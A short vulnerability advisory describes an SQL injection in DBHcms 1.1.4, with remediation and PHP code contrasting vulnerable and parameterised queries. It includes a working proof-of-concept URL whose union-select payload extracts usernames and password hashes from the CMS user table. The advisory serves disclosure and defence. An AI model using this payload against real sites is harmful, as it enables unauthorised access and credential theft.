DBHcms 1.1.4 SQL injection vulnerability and fix - vulnerability warning - myhack58 (黑吧安全网)

2010-10-27T00:00:00
ID MYHACK58:62201028202
Type myhack58
Reporter Anonymous
Modified 2010-10-27T00:00:00

Description

Vulnerability Description: DBHcms is an open source content management system for personal and small business websites; it supports multiple languages and has good support for search engine optimization. The root cause of the vulnerability is that submitted parameters are not strictly filtered, which allows SQL injection attacks.

SQL injection test code: http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--

Repair solution:

Strictly filter submitted parameters (such as dbhcms_pid and editmenu) before they are used in SQL queries.
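As an added example (not DBHcms's own code), the pattern behind this bug class next to the fix the advisory recommends, assuming the CMS reads editmenu from $_GET and concatenates it into a MySQL query; the menu table name and query text are hypothetical, only the parameter name comes from the PoC above.

```php
<?php
// Added example, not DBHcms source. Assumes the CMS takes the editmenu parameter
// from $_GET and builds a MySQL query from it; table name and query are hypothetical.

// Vulnerable pattern: the raw parameter is concatenated into SQL, so a value such
// as the "-2 union select ..." string in the PoC becomes part of the statement.
function loadMenuVulnerable(mysqli $db, array $get): mysqli_result|false
{
    $id = $get['editmenu'];
    return $db->query("SELECT * FROM dbhcms_cms_menu WHERE id = " . $id);
}

// Hardened pattern (the advisory's fix, "filter submitted parameters"): editmenu
// and dbhcms_pid are integer IDs, so reject anything that is not an integer ...
function readIntParam(array $get, string $name): int
{
    $value = filter_var($get[$name] ?? null, FILTER_VALIDATE_INT);
    if ($value === false) {
        throw new InvalidArgumentException("$name must be an integer");
    }
    return $value;
}

// ... and bind the value as a query parameter, so even a validated value can
// never change the structure of the SQL statement.
function loadMenuSafe(mysqli $db, array $get): mysqli_result|false
{
    $id = readIntParam($get, 'editmenu');
    $stmt = $db->prepare("SELECT * FROM dbhcms_cms_menu WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result();
}
```

With the hardened version, the PoC request above fails validation in readIntParam and never reaches the database.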